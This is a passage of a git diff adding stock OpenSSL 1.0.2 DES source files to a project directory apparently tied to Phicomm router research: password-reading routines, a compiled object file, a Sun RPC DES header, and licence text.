+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <string.h>
+#include <openssl/des.h>
+#include <openssl/ui.h>
+#include <openssl/crypto.h>
+
+int DES_read_password(DES_cblock *key, const char *prompt, int verify)
+{
+    int ok;
+    char buf[BUFSIZ], buff[BUFSIZ];
+
+    if ((ok = UI_UTIL_read_pw(buf, buff, BUFSIZ, prompt, verify)) == 0)
+        DES_string_to_key(buf, key);
+    OPENSSL_cleanse(buf, BUFSIZ);
+    OPENSSL_cleanse(buff, BUFSIZ);
+    return (ok);
+}
+
+int DES_read_2passwords(DES_cblock *key1, DES_cblock *key2,
+                        const char *prompt, int verify)
+{
+    int ok;
+    char buf[BUFSIZ], buff[BUFSIZ];
+
+    if ((ok = UI_UTIL_read_pw(buf, buff, BUFSIZ, prompt, verify)) == 0)
+        DES_string_to_2keys(buf, key1, key2);
+    OPENSSL_cleanse(buf, BUFSIZ);
+    OPENSSL_cleanse(buff, BUFSIZ);
+    return (ok);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/read2pwd.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/read2pwd.o
new file mode 100644
index 0000000000000000000000000000000000000000..229e42f53938298f1f3ad26c02a68da065f66b1b
GIT binary patch
literal 2424
zcmbuBPiWIn7{I^&nX9_RDjo)k^f0BO3*8@ZdXT1Tw@jiFw@w9T$l7d^b!}-<=R7C_
z9fbYS<8I<j@G2-GGMERCdh_VfgZ~8uQRnw1dFyLT5%hyE@4a8Xe|g_a+UpsmKNtuA
zlK>ot+KN$t-YvCx(w-)v6<XlSj(y*yQQ7(=SuY+#7(mJnT0f<ctUUj=Edr327sLDG
z=pb7++9L=$*OcW4?Gdz;mkaF?#ri5+AKp+z$$EBkt-4*Y-ZS!)0@f`Q>zi#WFFMik
za<>!SY;ySgGs>E_UXMu^q%rB@x?SK|$$BnZFP#EM2d%GMl~J_!t?~(9<u6u-Q>CC-
zpZ`+m#@`C1#I-^tbsYx!`i{lo+3{-8tj3Ot-D0An^GMZRc3$gBh>4zq4hGs7h@v*3
z4xGwD5MYg12$f{FGeF?#83<g72KKZxM{Z+ddy(&T@7<-bUx=;*PYP|zp^Ok)3QIzK
zp=m%^iv}+X@w5<232iAMni8;9NTQxYCAm)*^u0yCE9AQz&Is|PCP_#vY_S8(35m22
zPu0gDH$R~>7luz8e)mGYCz76(J#D>L$ljfLMyn8ThnTw^f@W@2n}&d%`cDbjyI#**
zaJh@C)81QT`%tM*Ug<&L$I}h?XahdcfX^bQdRQHHzmP39u!oAS<-5wWc`*m+%&<yJ
zwX7M&Y^jn5bwC+PNs2nu-#?rgQAebdl2IW$sAfk771wsw_A|`NrQ)P&megr|4u(!=
zP7Mz$YObJbMMDQwHB2oxt>&ht)d}rVp_ZzP<uW{Bx-gD`XB_J$p)<Z6^~Z)I=Lw<^
zryej)`$9sz6_s%eWs8^7zK{?XP?`NZf+)oKyg@p!D8#9c%zg*Q`Mi4@@E(ryd1Dxp
z1mA00?FC*gxD&?jvKyi?H)Cq!AYuocaf;0<dO;IS{fY@<UNbci#|;C-Txn)TFCr_J
zOkKopNQd1UcRg9GiseeFtXIrA5bX&1lsZw-W^|VEzs4AP)1!Oe$Rsin#oZTY<=C=0
zjeAgO?~|y!+#`tc(HUSHjueW$$!#t_;BxO5WXY4)HRs-JhaAR%V*aatC;C#V1S&5q
z{~;dYoR!7KV;tj6A2I_T`q-X8MqfQTN4z|8{bM}DIom&m$8kcYUjJ9F|0*+dN3Z`F
za=-qq(hnL6+ZXB|`7(djKfm1MS9S|pb?cyacB_v+F>mh>0sS!{x#J9*S2x_|dMD2O
P{GYq^7d9=OiP!%(6NOMJ

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/read_pwd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/read_pwd.c
new file mode 100644
index 0000000..66b4773
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/read_pwd.c
@@ -0,0 +1,533 @@
+/* crypto/des/read_pwd.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/e_os2.h>
+#if !defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_VMS) && !defined(OPENSSL_SYS_WIN32)
+# ifdef OPENSSL_UNISTD
+#  include OPENSSL_UNISTD
+# else
+#  include <unistd.h>
+# endif
+/*
+ * If unistd.h defines _POSIX_VERSION, we conclude that we are on a POSIX
+ * system and have sigaction and termios.
+ */
+# if defined(_POSIX_VERSION)
+
+#  define SIGACTION
+#  if !defined(TERMIOS) && !defined(TERMIO) && !defined(SGTTY)
+#   define TERMIOS
+#  endif
+
+# endif
+#endif
+
+/* Define this if you have sigaction() */
+/* #define SIGACTION */
+
+#ifdef WIN16TTY
+# undef OPENSSL_SYS_WIN16
+# undef _WINDOWS
+# include <graph.h>
+#endif
+
+/* 06-Apr-92 Luke Brennan    Support for VMS */
+#include "des_locl.h"
+#include "cryptlib.h"
+#include <signal.h>
+#include <stdio.h>
+#include <string.h>
+#include <setjmp.h>
+#include <errno.h>
+
+#ifdef OPENSSL_SYS_VMS          /* prototypes for sys$whatever */
+# include <starlet.h>
+# ifdef __DECC
+#  pragma message disable DOLLARID
+# endif
+#endif
+
+#ifdef WIN_CONSOLE_BUG
+# include <windows.h>
+# ifndef OPENSSL_SYS_WINCE
+#  include <wincon.h>
+# endif
+#endif
+
+/*
+ * There are 5 types of terminal interface supported, TERMIO, TERMIOS, VMS,
+ * MSDOS and SGTTY
+ */
+
+#if defined(__sgi) && !defined(TERMIOS)
+# define TERMIOS
+# undef  TERMIO
+# undef  SGTTY
+#endif
+
+#if defined(linux) && !defined(TERMIO)
+# undef  TERMIOS
+# define TERMIO
+# undef  SGTTY
+#endif
+
+#ifdef _LIBC
+# undef  TERMIOS
+# define TERMIO
+# undef  SGTTY
+#endif
+
+#if !defined(TERMIO) && !defined(TERMIOS) && !defined(OPENSSL_SYS_VMS) && !defined(OPENSSL_SYS_MSDOS) && !defined(MAC_OS_pre_X) && !defined(MAC_OS_GUSI_SOURCE)
+# undef  TERMIOS
+# undef  TERMIO
+# define SGTTY
+#endif
+
+#if defined(OPENSSL_SYS_VXWORKS)
+# undef TERMIOS
+# undef TERMIO
+# undef SGTTY
+#endif
+
+#ifdef TERMIOS
+# include <termios.h>
+# define TTY_STRUCT              struct termios
+# define TTY_FLAGS               c_lflag
+# define TTY_get(tty,data)       tcgetattr(tty,data)
+# define TTY_set(tty,data)       tcsetattr(tty,TCSANOW,data)
+#endif
+
+#ifdef TERMIO
+# include <termios.h>
+# define TTY_STRUCT              struct termio
+# define TTY_FLAGS               c_lflag
+# define TTY_get(tty,data)       ioctl(tty,TCGETA,data)
+# define TTY_set(tty,data)       ioctl(tty,TCSETA,data)
+#endif
+
+#ifdef SGTTY
+# include <sgtty.h>
+# define TTY_STRUCT              struct sgttyb
+# define TTY_FLAGS               sg_flags
+# define TTY_get(tty,data)       ioctl(tty,TIOCGETP,data)
+# define TTY_set(tty,data)       ioctl(tty,TIOCSETP,data)
+#endif
+
+#if !defined(_LIBC) && !defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_VMS) && !defined(MAC_OS_pre_X)
+# include <sys/ioctl.h>
+#endif
+
+#if defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_WINCE)
+# include <conio.h>
+# define fgets(a,b,c) noecho_fgets(a,b,c)
+#endif
+
+#ifdef OPENSSL_SYS_VMS
+# include <ssdef.h>
+# include <iodef.h>
+# include <ttdef.h>
+# include <descrip.h>
+struct IOSB {
+    short iosb$w_value;
+    short iosb$w_count;
+    long iosb$l_info;
+};
+#endif
+
+#if defined(MAC_OS_pre_X) || defined(MAC_OS_GUSI_SOURCE)
+/*
+ * This one needs work. As a matter of fact the code is unoperational
+ * and this is only a trick to get it compiled.
+ *                                      <appro@fy.chalmers.se>
+ */
+# define TTY_STRUCT int
+#endif
+
+#ifndef NX509_SIG
+# define NX509_SIG 32
+#endif
+
+static void read_till_nl(FILE *);
+static void recsig(int);
+static void pushsig(void);
+static void popsig(void);
+#if defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_WIN16)
+static int noecho_fgets(char *buf, int size, FILE *tty);
+#endif
+#ifdef SIGACTION
+static struct sigaction savsig[NX509_SIG];
+#else
+static void (*savsig[NX509_SIG]) (int);
+#endif
+static jmp_buf save;
+
+int des_read_pw_string(char *buf, int length, const char *prompt, int verify)
+{
+    char buff[BUFSIZ];
+    int ret;
+
+    ret =
+        des_read_pw(buf, buff, (length > BUFSIZ) ? BUFSIZ : length, prompt,
+                    verify);
+    OPENSSL_cleanse(buff, BUFSIZ);
+    return (ret);
+}
+
+#ifdef OPENSSL_SYS_WINCE
+
+int des_read_pw(char *buf, char *buff, int size, const char *prompt,
+                int verify)
+{
+    memset(buf, 0, size);
+    memset(buff, 0, size);
+    return (0);
+}
+
+#elif defined(OPENSSL_SYS_WIN16)
+
+int des_read_pw(char *buf, char *buff, int size, char *prompt, int verify)
+{
+    memset(buf, 0, size);
+    memset(buff, 0, size);
+    return (0);
+}
+
+#else                           /* !OPENSSL_SYS_WINCE && !OPENSSL_SYS_WIN16 */
+
+static void read_till_nl(FILE *in)
+{
+# define SIZE 4
+    char buf[SIZE + 1];
+
+    do {
+        fgets(buf, SIZE, in);
+    } while (strchr(buf, '\n') == NULL);
+}
+
+/* return 0 if ok, 1 (or -1) otherwise */
+int des_read_pw(char *buf, char *buff, int size, const char *prompt,
+                int verify)
+{
+# ifdef OPENSSL_SYS_VMS
+    struct IOSB iosb;
+    $DESCRIPTOR(terminal, "TT");
+    long tty_orig[3], tty_new[3];
+    long status;
+    unsigned short channel = 0;
+# else
+#  if !defined(OPENSSL_SYS_MSDOS) || defined(__DJGPP__)
+    TTY_STRUCT tty_orig, tty_new;
+#  endif
+# endif
+    int number;
+    int ok;
+    /*
+     * statics are simply to avoid warnings about longjmp clobbering things
+     */
+    static int ps;
+    int is_a_tty;
+    static FILE *tty;
+    char *p;
+
+    if (setjmp(save)) {
+        ok = 0;
+        goto error;
+    }
+
+    number = 5;
+    ok = 0;
+    ps = 0;
+    is_a_tty = 1;
+    tty = NULL;
+
+# ifdef OPENSSL_SYS_MSDOS
+    if ((tty = fopen("con", "r")) == NULL)
+        tty = stdin;
+# elif defined(MAC_OS_pre_X) || defined(OPENSSL_SYS_VXWORKS)
+    tty = stdin;
+# else
+#  ifndef OPENSSL_SYS_MPE
+    if ((tty = fopen("/dev/tty", "r")) == NULL)
+#  endif
+        tty = stdin;
+# endif
+
+# if defined(TTY_get) && !defined(OPENSSL_SYS_VMS)
+    if (TTY_get(fileno(tty), &tty_orig) == -1) {
+#  ifdef ENOTTY
+        if (errno == ENOTTY)
+            is_a_tty = 0;
+        else
+#  endif
+#  ifdef EINVAL
+            /*
+             * Ariel Glenn ariel@columbia.edu reports that solaris can return
+             * EINVAL instead.  This should be ok
+             */
+        if (errno == EINVAL)
+            is_a_tty = 0;
+        else
+#  endif
+            return (-1);
+    }
+    memcpy(&(tty_new), &(tty_orig), sizeof(tty_orig));
+# endif
+# ifdef OPENSSL_SYS_VMS
+    status = sys$assign(&terminal, &channel, 0, 0);
+    if (status != SS$_NORMAL)
+        return (-1);
+    status =
+        sys$qiow(0, channel, IO$_SENSEMODE, &iosb, 0, 0, tty_orig, 12, 0, 0,
+                 0, 0);
+    if ((status != SS$_NORMAL) || (iosb.iosb$w_value != SS$_NORMAL))
+        return (-1);
+# endif
+
+    pushsig();
+    ps = 1;
+
+# ifdef TTY_FLAGS
+    tty_new.TTY_FLAGS &= ~ECHO;
+# endif
+
+# if defined(TTY_set) && !defined(OPENSSL_SYS_VMS)
+    if (is_a_tty && (TTY_set(fileno(tty), &tty_new) == -1))
+#  ifdef OPENSSL_SYS_MPE
+        ;                       /* MPE lies -- echo really has been disabled */
+#  else
+        return (-1);
+#  endif
+# endif
+# ifdef OPENSSL_SYS_VMS
+    tty_new[0] = tty_orig[0];
+    tty_new[1] = tty_orig[1] | TT$M_NOECHO;
+    tty_new[2] = tty_orig[2];
+    status =
+        sys$qiow(0, channel, IO$_SETMODE, &iosb, 0, 0, tty_new, 12, 0, 0, 0,
+                 0);
+    if ((status != SS$_NORMAL) || (iosb.iosb$w_value != SS$_NORMAL))
+        return (-1);
+# endif
+    ps = 2;
+
+    while ((!ok) && (number--)) {
+        fputs(prompt, stderr);
+        fflush(stderr);
+
+        buf[0] = '\0';
+        fgets(buf, size, tty);
+        if (feof(tty))
+            goto error;
+        if (ferror(tty))
+            goto error;
+        if ((p = (char *)strchr(buf, '\n')) != NULL)
+            *p = '\0';
+        else
+            read_till_nl(tty);
+        if (verify) {
+            fprintf(stderr, "\nVerifying password - %s", prompt);
+            fflush(stderr);
+            buff[0] = '\0';
+            fgets(buff, size, tty);
+            if (feof(tty))
+                goto error;
+            if ((p = (char *)strchr(buff, '\n')) != NULL)
+                *p = '\0';
+            else
+                read_till_nl(tty);
+
+            if (strcmp(buf, buff) != 0) {
+                fprintf(stderr, "\nVerify failure");
+                fflush(stderr);
+                break;
+                /* continue; */
+            }
+        }
+        ok = 1;
+    }
+
+ error:
+    fprintf(stderr, "\n");
+# if 0
+    perror("fgets(tty)");
+# endif
+    /* What can we do if there is an error? */
+# if defined(TTY_set) && !defined(OPENSSL_SYS_VMS)
+    if (ps >= 2)
+        TTY_set(fileno(tty), &tty_orig);
+# endif
+# ifdef OPENSSL_SYS_VMS
+    if (ps >= 2)
+        status =
+            sys$qiow(0, channel, IO$_SETMODE, &iosb, 0, 0, tty_orig, 12, 0, 0,
+                     0, 0);
+# endif
+
+    if (ps >= 1)
+        popsig();
+    if (stdin != tty)
+        fclose(tty);
+# ifdef OPENSSL_SYS_VMS
+    status = sys$dassgn(channel);
+# endif
+    return (!ok);
+}
+
+static void pushsig(void)
+{
+    int i;
+# ifdef SIGACTION
+    struct sigaction sa;
+
+    memset(&sa, 0, sizeof sa);
+    sa.sa_handler = recsig;
+# endif
+
+    for (i = 1; i < NX509_SIG; i++) {
+# ifdef SIGUSR1
+        if (i == SIGUSR1)
+            continue;
+# endif
+# ifdef SIGUSR2
+        if (i == SIGUSR2)
+            continue;
+# endif
+# ifdef SIGACTION
+        sigaction(i, &sa, &savsig[i]);
+# else
+        savsig[i] = signal(i, recsig);
+# endif
+    }
+
+# ifdef SIGWINCH
+    signal(SIGWINCH, SIG_DFL);
+# endif
+}
+
+static void popsig(void)
+{
+    int i;
+
+    for (i = 1; i < NX509_SIG; i++) {
+# ifdef SIGUSR1
+        if (i == SIGUSR1)
+            continue;
+# endif
+# ifdef SIGUSR2
+        if (i == SIGUSR2)
+            continue;
+# endif
+# ifdef SIGACTION
+        sigaction(i, &savsig[i], NULL);
+# else
+        signal(i, savsig[i]);
+# endif
+    }
+}
+
+static void recsig(int i)
+{
+    longjmp(save, 1);
+# ifdef LINT
+    i = i;
+# endif
+}
+
+# ifdef OPENSSL_SYS_MSDOS
+static int noecho_fgets(char *buf, int size, FILE *tty)
+{
+    int i;
+    char *p;
+
+    p = buf;
+    for (;;) {
+        if (size == 0) {
+            *p = '\0';
+            break;
+        }
+        size--;
+#  ifdef WIN16TTY
+        i = _inchar();
+#  else
+        i = getch();
+#  endif
+        if (i == '\r')
+            i = '\n';
+        *(p++) = i;
+        if (i == '\n') {
+            *p = '\0';
+            break;
+        }
+    }
+#  ifdef WIN_CONSOLE_BUG
+    /*
+     * Win95 has several evil console bugs: one of these is that the last
+     * character read using getch() is passed to the next read: this is
+     * usually a CR so this can be trouble. No STDIO fix seems to work but
+     * flushing the console appears to do the trick.
+     */
+    {
+        HANDLE inh;
+        inh = GetStdHandle(STD_INPUT_HANDLE);
+        FlushConsoleInputBuffer(inh);
+    }
+#  endif
+    return (strlen(buf));
+}
+# endif
+#endif                          /* !OPENSSL_SYS_WINCE && !WIN16 */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpc_des.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpc_des.h
new file mode 100644
index 0000000..4db9062
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpc_des.h
@@ -0,0 +1,130 @@
+/* crypto/des/rpc_des.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*  @(#)des.h   2.2 88/08/10 4.0 RPCSRC; from 2.7 88/02/08 SMI  */
+/*-
+ * Sun RPC is a product of Sun Microsystems, Inc. and is provided for
+ * unrestricted use provided that this legend is included on all tape
+ * media and as a part of the software program in whole or part.  Users
+ * may copy or modify Sun RPC without charge, but are not authorized
+ * to license or distribute it to anyone else except as part of a product or
+ * program developed by the user.
+ *
+ * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE
+ * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE.
+ *
+ * Sun RPC is provided with no support and without any obligation on the
+ * part of Sun Microsystems, Inc. to assist in its use, correction,
+ * modification or enhancement.
+ *
+ * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE
+ * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC
+ * OR ANY PART THEREOF.
+ *
+ * In no event will Sun Microsystems, Inc. be liable for any lost revenue
+ * or profits or other special, indirect and consequential damages, even if
+ * Sun has been advised of the possibility of such damages.
+ *
+ * Sun Microsystems, Inc.
+ * 2550 Garcia Avenue
+ * Mountain View, California  94043
+ */
+/*
+ * Generic DES driver interface
+ * Keep this file hardware independent!
+ * Copyright (c) 1986 by Sun Microsystems, Inc.
+ */
+
+#define DES_MAXLEN      65536   /* maximum # of bytes to encrypt */
+#define DES_QUICKLEN    16      /* maximum # of bytes to encrypt quickly */
+
+#ifdef HEADER_DES_H
+# undef ENCRYPT
+# undef DECRYPT
+#endif
+
+enum desdir { ENCRYPT, DECRYPT };
+enum desmode { CBC, ECB };
+
+/*
+ * parameters to ioctl call
+ */
+struct desparams {
+    unsigned char des_key[8];   /* key (with low bit parity) */
+    enum desdir des_dir;        /* direction */
+    enum desmode des_mode;      /* mode */
+    unsigned char des_ivec[8];  /* input vector */
+    unsigned des_len;           /* number of bytes to crypt */
+    union {
+        unsigned char UDES_data[DES_QUICKLEN];
+        unsigned char *UDES_buf;
+    } UDES;
+#define des_data UDES.UDES_data /* direct data here if quick */
+#define des_buf  UDES.UDES_buf  /* otherwise, pointer to data */
+};
+
+/*
+ * Encrypt an arbitrary sized buffer
+ */
+#define DESIOCBLOCK     _IOWR('d', 6, struct desparams)
+
+/*
+ * Encrypt of small amount of data, quickly
+ */
+#define DESIOCQUICK     _IOWR('d', 7, struct desparams)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpc_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpc_enc.c
new file mode 100644
index 0000000..f5a84c5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpc_enc.c
@@ -0,0 +1,100 @@
+/* crypto/des/rpc_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
